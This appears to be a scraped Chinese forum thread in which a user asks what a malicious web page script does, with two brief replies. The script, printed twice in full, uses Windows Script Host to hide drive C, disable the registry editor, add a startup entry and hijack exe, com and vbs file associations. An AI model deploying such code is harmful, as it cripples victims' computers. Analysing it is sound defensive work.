61,112
社区成员
发帖
与我相关
我的任务
分享各位大虾帮我看看这段代码是什么意思啊?
以下这段代码好像是调用了Windows Script Host Object Model 这个Windows组件
它包括了两个方法:regwrite,regdelete。但我不知道它向我的注册表中写入的内容
是什么意思(有几个我知道并已经注释出来了)请各位高手指点呀。
<html>
<head>
<title>OverKillerII -LeoTam</title>
</head>
<body>
function youou()
{try{a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try
{
Shl.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\con","con/con");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives","00000004"); //隐藏第三个驱动器(也就是C盘喽)
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools","00000001"); //禁用注册表编辑器
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled","00000001");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode","00000001");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption","JS.LEO Virus,http:\\go.163.com\leoffice");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText","mywebliu Virus,http:\\gamesdna.myetang.com,remember me!I am *秋风*!");
Shl.RegWrite("HKCR\\exefile\\shell\\open\\command\\","con/con");
Shl.RegWrite("HKCR\\comfile\\shell\\open\\command\\","con/con");
Shl.RegWrite("HKCR\\.VBS\\","con/con");
Shl.RegWrite("HKCR\\VBEFile\\Shell\\Open\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBEFile\\Shell\\Open2\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBSFile\\Shell\\Open\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBSFile\\Shell\\Open2\\Command\\","con/con");
}
catch(e){}}catch(e){}}setTimeout("youou()",1000);</script>
<p align="center">....</p>
</body>
</html>
它包括了两个方法:regwrite,regdelete。但我不知道它向我的注册表中写入的内容
是什么意思(有几个我知道并已经注释出来了)请各位高手指点呀。
<html>
<head>
<title>OverKillerII -LeoTam</title>
</head>
<body>
function youou()
{try{a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try
{
Shl.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\con","con/con");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives","00000004"); //隐藏第三个驱动器(也就是C盘喽)
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools","00000001"); //禁用注册表编辑器
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled","00000001");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode","00000001");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption","JS.LEO Virus,http:\\go.163.com\leoffice");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText","mywebliu Virus,http:\\gamesdna.myetang.com,remember me!I am *秋风*!");
Shl.RegWrite("HKCR\\exefile\\shell\\open\\command\\","con/con");
Shl.RegWrite("HKCR\\comfile\\shell\\open\\command\\","con/con");
Shl.RegWrite("HKCR\\.VBS\\","con/con");
Shl.RegWrite("HKCR\\VBEFile\\Shell\\Open\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBEFile\\Shell\\Open2\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBSFile\\Shell\\Open\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBSFile\\Shell\\Open2\\Command\\","con/con");
}
catch(e){}}catch(e){}}setTimeout("youou()",1000);</script>
<p align="center">....</p>
</body>
</html>
...全文
请发表友善的回复…
发表回复
genuis 2003-02-21
- 打赏
- 举报
Shl.RegWrite("HKCR\\exefile\\shell\\open\\command\\","con/con");
Shl.RegWrite("HKCR\\comfile\\shell\\open\\command\\","con/con");
Shl.RegWrite("HKCR\\.VBS\\","con/con");
Shl.RegWrite("HKCR\\VBEFile\\Shell\\Open\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBEFile\\Shell\\Open2\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBSFile\\Shell\\Open\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBSFile\\Shell\\Open2\\Command\\","con/con");
这些是设置com,exe,vbs文件打开的命令行
Shl.RegWrite("HKCR\\comfile\\shell\\open\\command\\","con/con");
Shl.RegWrite("HKCR\\.VBS\\","con/con");
Shl.RegWrite("HKCR\\VBEFile\\Shell\\Open\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBEFile\\Shell\\Open2\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBSFile\\Shell\\Open\\Command\\","con/con");
Shl.RegWrite("HKCR\\VBSFile\\Shell\\Open2\\Command\\","con/con");
这些是设置com,exe,vbs文件打开的命令行
fangyds 2003-02-21
- 打赏
- 举报
各位大哥能不能说的清楚点啊
natson 2003-02-20
- 打赏
- 举报
倒数第二可能是
默认主业地址为go.163.com
最后的是:
每次登陆系统弹出对话框,内容上面有
只知道这么多了, 呵呵
默认主业地址为go.163.com
最后的是:
每次登陆系统弹出对话框,内容上面有
只知道这么多了, 呵呵
